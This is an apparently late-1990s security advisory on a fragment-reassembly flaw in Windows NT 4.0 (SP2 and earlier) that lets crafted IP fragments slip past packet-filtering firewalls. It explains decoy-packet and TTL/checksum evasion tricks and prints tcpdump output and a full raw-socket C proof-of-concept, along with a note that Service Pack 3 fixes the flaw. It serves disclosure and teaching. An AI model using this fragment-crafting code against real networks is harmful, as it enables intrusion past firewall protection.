COMMAND
fragmentation attack
SYSTEMS AFFECTED
Win NT 4.0
PROBLEM
Thomas Lopatic found the following. Windows NT 4.0 (up to Service
Pack 2) hosts which are protected by a packet filtering firewall
are vulnerable to a new kind of fragmentation attack. Details are
taken from http://www.dataprotect.com/ntfrag/
The attack affects Windows NT 4.0 hosts (up to and including
Service Pack 2) that are protected by a firewall which is based
on packet screening. Stateful inspection firewalls may also be
affected, depending on their implementation. Using this
weakness, an outsider is able to pass IP datagrams through the
firewall to the Windows NT host, i.e. access the host as if the
firewall did not exist.
When reassembling a fragmented IP packet, the Microsoft
implementation does not require the first fragment to have an
offset value of zero. It merely checks whether the sum of the
lengths of the collected fragments equals the total length of the
original unfragmented IP packet. If enough fragments have been
received so that this condition holds, the NT stack will happily
reassemble what it has got so far.
So how does it know about the total length of the original
packet? Since, during normal operation, all fragments but the
last have the MF (more fragments) bit set, Microsoft's stack
waits until it has received a fragment F without the MF bit and
then reasons that the length of the unfragmented datagram must
have been offset of F + length of F. Apparently Microsoft have
tried to be particularly efficient since this method is faster
than traversing the whole list of fragments to check for
completeness.
Thomas illustrated this mechanism with an example. Say that we
have an original packet of 48 bytes which we send as three
fragments F1, F2 and F3, each with a length of 16 bytes. Now
suppose that they arrive out of order, first F2, then F3 and
eventually F1. The following table shows NT's notion of the
total packet length after each fragment has arrived.
Fragment  Offset  Length  MF bit  Total Length                        Data Collected
F2        16      16      1       0  (no change, since MF = 1)        16
F3        32      16      0       48 (= offset + length = 32 + 16)    32
F1        0       16      1       48 (no change, since MF = 1)        48
After Total Length equals Data Collected, the IP stack decides
that it has received all fragments and starts reassembling. To
exploit this goodie courtesy of Microsoft, we will clear the MF
bit on a fragment other than the last one. Suppose we send two
new fragments, F1 and F2, as follows.
Fragment  Offset  Length  MF bit  Total Length                        Data Collected
F1        16      16      0       32 (= offset + length = 16 + 16)    16
F2        32      16      1       32 (no change, since MF = 1)        32
We have just sent two fragments, neither of which has an offset of
zero, yet the NT protocol stack will reassemble them into a
32 byte IP packet.
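The bookkeeping described above can be modelled in a few lines of C.
This is only a sketch of the check as the text describes it, not
Microsoft's code; the struct and function names (frag, reasm,
flawed_add, flawed_feed) are assumptions made for illustration.

```c
#include <assert.h>
#include <stddef.h>

/* One IP fragment, reduced to the fields the check looks at. */
struct frag {
    unsigned offset;  /* byte offset within the original datagram */
    unsigned length;  /* payload bytes carried by this fragment */
    int mf;           /* 1 if the MF (more fragments) bit is set */
};

/* Hypothetical reassembly state, modelled on the description above. */
struct reasm {
    unsigned total_len;  /* inferred total length, 0 until MF = 0 is seen */
    unsigned collected;  /* sum of the fragment lengths received so far */
};

/* Feed one fragment; return 1 if the flawed check declares completeness. */
int flawed_add(struct reasm *r, const struct frag *f)
{
    assert(r != NULL && f != NULL);
    if (!f->mf)
        r->total_len = f->offset + f->length;  /* only MF = 0 sets the total */
    r->collected += f->length;
    return r->total_len != 0 && r->collected == r->total_len;
}

/* Feed a sequence of fragments in arrival order. Returns the 1-based index
   of the fragment that triggers reassembly, or 0 if none does. */
int flawed_feed(const struct frag *frags, size_t n)
{
    struct reasm r = {0, 0};
    size_t i;

    for (i = 0; i < n; i++)
        if (flawed_add(&r, &frags[i]))
            return (int)(i + 1);
    return 0;
}
```

Feeding the three fragments of the first table (F2, F3, F1) makes
flawed_feed report completion at the third fragment. Feeding the two
fragments of the second table reports completion at the second one,
although no fragment with an offset of zero was ever seen.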
Exploiting this feature is a bit more complicated than it seems at
first sight. Since the IP stack stores the IP header of a
fragment (to use it later for the reassembled packet) if and only
if its offset is zero, we must send a decoy packet first, which
must be carefully crafted so that it will be stored at exactly
the same memory location as our next packet, which is the
malicious one without the zero-offset-fragment. So, the bogus
datagram will reuse the header information of our first datagram.
Imagine that we would like to attack a WWW server behind a
firewall. Then we would send one decoy to port 80, a malicious
packet to port 23, another decoy to port 80, another bogus packet to
port 23, etc. In this way we can establish a telnet session
through the packet screen.
But what do we do when we hit a packet screen (e.g. screend) which
requires every fragmented packet to include a fragment with an
offset of zero? We send such a fragment and simply give it a
time to live that is short enough so that it will reach the
firewall but never the destination host. Another option would be
to insert an invalid checksum into its IP header so that it will
be dropped at the destination host.
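The checksum variant works because a receiver verifies the IP header
checksum before it looks at anything else. The sketch below shows that
check in the style of RFC 1071: the one's complement sum over all header
words, checksum field included, must come out as 0xffff. The function
names are hypothetical, and the header is treated as an array of 16-bit
words exactly as they sit in memory.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One's complement sum of n 16-bit words, folded back to 16 bits. */
uint16_t ones_sum(const uint16_t *words, size_t n)
{
    uint32_t sum = 0;

    assert(words != NULL);
    while (n--)
        sum += *words++;
    sum = (sum >> 16) + (sum & 0xffff);  /* fold the carries in */
    sum = (sum >> 16) + (sum & 0xffff);  /* the first fold may carry again */
    return (uint16_t)sum;
}

/* Value to store in the checksum field; the field itself must be zero
   while this is computed. */
uint16_t header_checksum(const uint16_t *hdr, size_t n)
{
    return (uint16_t)~ones_sum(hdr, n);
}

/* Receiver-side check: a header with a valid checksum sums to 0xffff. */
int header_ok(const uint16_t *hdr, size_t n)
{
    return ones_sum(hdr, n) == 0xffff;
}
```

A 20 byte header without options is n = 10 words. A fragment whose
header fails header_ok is discarded by the receiving host, which is
what the trick above relies on.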
In order to back up the above theory with an example, Thomas has
written a short program which sends a decoy UDP datagram to port
9 (discard) of his NT system and after that another UDP datagram
to port 7 (echo). He used port 255 as the source port. The
program runs on NetBSD 1.2 and should be easily portable to any
BSD system featuring the Berkeley Packet Filter. Here is the
output of tcpdump after an example run.
bob:/usr/home/tl# tcpdump
tcpdump: listening on ed0
01:54:38.751853 bob.255 > alice.discard: udp 248 (frag 256:256@0+)
01:54:38.752252 bob > alice: (frag 256:256@256)
01:54:38.752645 bob > alice: (frag 512:256@256)
01:54:38.753054 bob > alice: (frag 512:256@512+)
01:54:38.755716 alice.echo > bob.255: udp 248
01:54:38.755992 bob > alice: icmp: bob udp port 255 unreachable
^C
6 packets received by filter
0 packets dropped by kernel
bob:/usr/home/tl#
As can be easily seen, alice responds (line seven of the above
listing) to the two fragments sent by bob (lines five and six of
the above listing). The first two fragments (lines three and
four) make up the decoy packet. Eventually, alice gets an ICMP
message, since bob does not have any service listening at port
255. The source code for this little demo program is available
below.
/*
This program demonstrates a new kind of fragmentation attack
involving Windows NT 4.0 hosts behind packet filtering firewalls.
See http://www.dataprotect.com/ntfrag/ for details on this attack.
It should compile cleanly on any BSD system which has the Berkeley
Packet Filter installed and has been tested on NetBSD 1.2 against
a Windows NT 4.0 (SP2) host.
OpenBSD patches provided by Theo de Raadt <deraadt@cvs.openbsd.org>
SERVICE PACK 3 FIXES THIS PROBLEM! INSTALL IT - NOW!
Thomas Lopatic (thomas@dataprotect.com), 970709
*/
#include <sys/types.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/errno.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <net/bpf.h>
#include <net/if.h>
#include <stdlib.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
char bpf_dev[] = "/dev/bpf1"; /* the BPF device to use */
char inter[] = "ed0"; /* the ethernet device we'll attach to */
char src[] = "172.16.0.2"; /* our address */
char dest[] = "172.16.0.1"; /* the target system's address */
int sport = 255; /* the source port for the UDP datagram */
int dport = 9; /* the decoy destination port */
int real_dport = 7; /* the real destination port */
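/* one's complement sum of len 16-bit words, seeded with start */
u_short calc_sum(u_short start, u_short *buff, int len)
{
  u_long sum = start;

  while (len--)
    sum += *buff++;
  /* fold the carries back into the low 16 bits (twice, in case the
     first fold produces another carry) */
  sum = (sum >> 16) + (sum & 0xffff);
  sum = (sum >> 16) + (sum & 0xffff);
  return sum;
}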
void dump_hex(u_char *buffer, int size)
{
  int i, off = 0;

  while (off < size) {
    printf("%.4x:", off);
    for (i = 0; i < 16 && i + off < size; i++)
      printf(" %.2x", buffer[i + off]);
    printf("\n");
    off += i;
  }
}
int main(int ac, char *av[])
{
  int i, s, k, bpf, res = 0, true = 1;
  unsigned char dgram[276];
  union {
    unsigned long l[3];
    unsigned short s[6];
    unsigned char c[12];
  } pseudo;
  struct ip *iph;
  struct udphdr *udph;
  struct sockaddr_in daddr;
  struct timeval to = {0, 500000};
  int blen;
  u_char *bbuff;
  struct ifreq req;
  struct bpf_hdr *bhdr;

  if (getuid()) {
    printf("you must be root to use this program\n");
    return 12;
  }
  if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    perror("socket");
    res = 1;
  } else {
    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &true, sizeof(true)) < 0) {
      perror("setsockopt");
      res = 2;
    } else if ((bpf = open(bpf_dev, O_RDWR)) < 0) {
      perror("open");
      res = 3;
    } else {
      if (ioctl(bpf, BIOCGBLEN, &blen) < 0) {
        perror("ioctl(BIOCGBLEN)");
        res = 4;
      } else if ((bbuff = malloc(blen)) == NULL) {
        perror("malloc");
        res = 5;
      } else {
        strcpy(req.ifr_name, inter);
        if (ioctl(bpf, BIOCSETIF, &req) < 0) {
          perror("ioctl(BIOCSETIF)");
          res = 6;
        } else if (ioctl(bpf, BIOCSRTIMEOUT, &to) < 0) {
          perror("ioctl(BIOCSRTIMEOUT)");
          res = 7;
        } else {
          daddr.sin_len = sizeof(daddr);
          daddr.sin_family = AF_INET;
          daddr.sin_port = dport;
          daddr.sin_addr.s_addr = inet_addr(dest);
          for (i = 0; i < sizeof(dgram); dgram[i++] = 0);
          for (i = 0; i < 3; pseudo.l[i++] = 0);
          iph = (struct ip *)&dgram[0];
          udph = (struct udphdr *)&dgram[20];
          iph->ip_v = IPVERSION;
          iph->ip_hl = 5;
#ifdef __OpenBSD__
          iph->ip_len = htons(276);
#else
          iph->ip_len = 276;
#endif
          iph->ip_id = 1;
          iph->ip_ttl = 255;
          iph->ip_p = pseudo.c[9] = IPPROTO_UDP;
          iph->ip_src.s_addr = pseudo.l[0] = inet_addr(src);
          iph->ip_dst.s_addr = pseudo.l[1] = inet_addr(dest);
          /*
          offset = 0, length = 256, MF = 1
          -> total length is not affected by this fragment
          */
#ifdef __OpenBSD__
          iph->ip_off = htons(0x2000);
#else
          iph->ip_off = 0x2000;
#endif
          iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);
          udph->uh_sport = htons(sport);
          udph->uh_dport = htons(dport);
          udph->uh_ulen = pseudo.s[5] = htons(256);
          udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph, 128);
          /* send the first half of the decoy */
          if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
                     sizeof(daddr)) < 0) {
            perror("sendto");
            res = 8;
          }
          /*
          offset = 256, length = 256, MF = 0
          -> total length is set to 512 by this fragment
          */
#ifdef __OpenBSD__
          iph->ip_off = htons(32);
#else
          iph->ip_off = 32;
#endif
          iph->ip_sum = 0;
          iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);
          for (i = 20; i < 276; dgram[i++] = 0);
          /* send the second half of the decoy */
          if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
                     sizeof(daddr)) < 0) {
            perror("sendto");
            res = 9;
          }
          iph->ip_id++;
          iph->ip_sum = 0;
          iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);
          udph->uh_sport = htons(sport);
          udph->uh_dport = htons(real_dport);
          udph->uh_ulen = pseudo.s[5] = htons(256);
          udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph, 128);
          /*
          send the first half of the real datagram
          we have kept the offset settings from above
          offset = 256, length = 256, MF = 0
          -> total length is set to 512 by this fragment
          */
          if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
                     sizeof(daddr)) < 0) {
            perror("sendto");
            res = 10;
          }
          /*
          offset = 512, length = 256, MF = 1
          -> total length is not affected
          */
#ifdef __OpenBSD__
          iph->ip_off = htons(0x2040);
#else
          iph->ip_off = 0x2040;
#endif
          iph->ip_sum = 0;
          iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);
          for (i = 20; i < 276; dgram[i++] = 0);
          /* send the second half of the real datagram */
          if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
                     sizeof(daddr)) < 0) {
            perror("sendto");
            res = 11;
          }
        }
        free(bbuff);
      }
      close(bpf);
    }
    close(s);
  }
  return res;
}
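The ip_off values used in the program (0x2000, 32 and 0x2040) follow
the layout of the IP header: the low 13 bits hold the fragment offset
in units of 8 bytes, and bit 0x2000 is the MF flag. The small helpers
below make that arithmetic explicit. Their names are hypothetical; on
BSD systems <netinet/ip.h> provides IP_MF and IP_OFFMASK for the same
purpose.

```c
#include <assert.h>

#define FRAG_MF      0x2000u  /* more-fragments flag */
#define FRAG_OFFMASK 0x1fffu  /* 13-bit fragment offset, in 8 byte units */

/* Pack a byte offset (a multiple of 8) and the MF flag into a
   host-order ip_off value. */
unsigned pack_ip_off(unsigned byte_offset, int mf)
{
    assert(byte_offset % 8 == 0 && byte_offset / 8 <= FRAG_OFFMASK);
    return (byte_offset / 8) | (mf ? FRAG_MF : 0u);
}

/* Byte offset encoded in a host-order ip_off value. */
unsigned ip_off_bytes(unsigned ip_off)
{
    return (ip_off & FRAG_OFFMASK) * 8;
}

/* 1 if the MF flag is set in a host-order ip_off value, else 0. */
int ip_off_mf(unsigned ip_off)
{
    return (ip_off & FRAG_MF) != 0;
}
```

With these, pack_ip_off(0, 1) gives 0x2000, pack_ip_off(256, 0) gives
32 and pack_ip_off(512, 1) gives 0x2040, which correspond to the
offsets 0+, 256 and 512+ that tcpdump prints for the fragments.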
SOLUTION
This problem has been fixed in Service Pack 3 (SP3), which
introduces a check that the IP stack has seen a fragment with an
offset of zero before reassembly is done.
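How SP3 implements this check is not documented here. The following is
a minimal sketch of the idea only, with assumed names (frag, reasm,
checked_add) and an assumed seen_first flag: completeness is reported
only after a fragment with an offset of zero has arrived. The sketch
does not look for holes or overlapping fragments, which a robust stack
would also have to handle.

```c
#include <assert.h>
#include <stddef.h>

/* One IP fragment, reduced to the fields the check looks at. */
struct frag {
    unsigned offset;  /* byte offset within the original datagram */
    unsigned length;  /* payload bytes carried by this fragment */
    int mf;           /* 1 if the MF (more fragments) bit is set */
};

/* Hypothetical reassembly state with the additional flag. */
struct reasm {
    unsigned total_len;  /* inferred total length, 0 until MF = 0 is seen */
    unsigned collected;  /* sum of the fragment lengths received so far */
    int seen_first;      /* 1 once a fragment with offset 0 has arrived */
};

/* Feed one fragment; return 1 only if the lengths add up AND a fragment
   with an offset of zero has been seen. */
int checked_add(struct reasm *r, const struct frag *f)
{
    assert(r != NULL && f != NULL);
    if (f->offset == 0)
        r->seen_first = 1;
    if (!f->mf)
        r->total_len = f->offset + f->length;
    r->collected += f->length;
    return r->seen_first && r->total_len != 0 &&
           r->collected == r->total_len;
}
```

With this check, the two fragments at offsets 16 and 32 from the
second table never trigger reassembly, while the legitimate out-of-order
sequence F2, F3, F1 still completes when F1 arrives.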